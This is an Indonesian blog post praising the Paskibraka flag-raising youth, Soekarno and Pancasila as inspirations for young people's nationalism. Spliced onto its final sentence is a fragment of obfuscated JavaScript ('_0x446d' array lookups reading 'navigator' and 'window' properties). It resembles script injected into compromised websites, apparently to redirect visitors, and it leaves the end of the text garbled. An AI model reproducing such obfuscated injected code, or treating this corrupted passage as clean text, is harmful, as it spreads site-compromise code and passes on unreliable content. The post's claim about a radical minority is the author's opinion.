Inspirasi dari tokoh bangsa dalam mengokohkan Nasionalisme generasi muda

Paskibraka

Begitu banyak Tokoh besar negeri ini yang menginspirasi kita semua. Teladan perjuangan mereka dalam mengawal keutuhan Indonesia, terutama mengawal Pancasila dan UUD ai??i??45. Mulai dari Pangeran Diponegoro yang hanya kita dengar ceritanya dari Guru dan buku sejarah, sampai dengan tokoh nasional saat ini yang masih dapat kita lihat keseharian lewat media ikut andil dalam membentuk semangat Patriotisme dan Nasionalisme.

Hari Kemerdekaan tanggal 17 Agustus merupakan saat-saat emosional bagi bangsa Indonesia. Banyak tulisan bernada patriotisme merebak diseluruh penjuru nusantara. Perasaan saya pun membuncah saat melihat sekelompok anak muda yang dipercaya mengibarkan bendera sang saka merah putih.

Paskibraka

Foto by acehterkini.com

Pasukan Pengibar Bendera Pusaka (Paskibraka), begitulah mereka ini disebut. Ada yang berbeda dibanding anak-anak muda yang lain. Mereka ini adalah anak-anak muda pilihan yang sudah melalui banyak tahap saringan dan latihan super ketat hingga akhirnya mereka akhirnya dilantik menjadi Paskibraka.

Yah, mereka ini adalah tokoh-tokoh anak muda masa kini yang boleh menjadi teladan bagi generasi muda Indonesia. Semangat yang mereka tampilkan tidak hanya formalitas yang hanya sedap dilihat, tetapi benar-benar terasa mulai saat mereka berlatih keras dan dilantik secara resmi oleh Presiden Joko Widodo.

Ketokohan menjadi salah satu hal yang mampu menumbuhkan dan mengokohkan rasa Nasionalisme dan patriotism bagi generasi muda. Sayangnya tidak banyak sekarang ini yang bisa dijadikan tokoh apalagi diidolakan anak muda. Para pemangku kepentingan lebih sibuk dengan urusan pribadi dan partai sehingga melupakan kepentingan negara.

Saya begitu mengidolakan bapak pendiri negara ini Ir. Soekarno, yang sekaligus pencetus mahakarya yang kita sebut PANCASILA. Dalam jatuh bangunnya beliau dalam mempertahankan kesatuan negara ini seringkali menjumpai saat-saat sulit dan prihatin, tetapi bertahan dengan keyakinannya.

Kebanggaan akan Pancasila seharusnya memang menjadi bagian dari kita semua warga negara Indonesia. Kebanggaan yang seharunya mampu menumbuhkan Nasionalisme yang menjadi benteng pertahanan dari radikalisme dan terorisme. Seolah mulai pudar dimakan perkembangan jaman dan arus teknologi.

Nasionalisme bangsa Indonesia saat ini sedang sangat dibutuhkan untuk mempertahankan Pancasila, yang kita semua tahu sedang berusaha dihapus bahkan dicabut dari akarnya oleh sekelompok minoritas yang radikal.
Kelompok Anak muda Paskibraka ini boleh dijadikan inspirasi dan semangat bahwa optimisme itu masih ada. Optimisme untuk menjadikan Indonesia lebih baik, Indonesia yang Gemah Ripah Loh Jinawi, Indonesia yang Damai. 446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply

Your email address will not be published. Required fields are marked *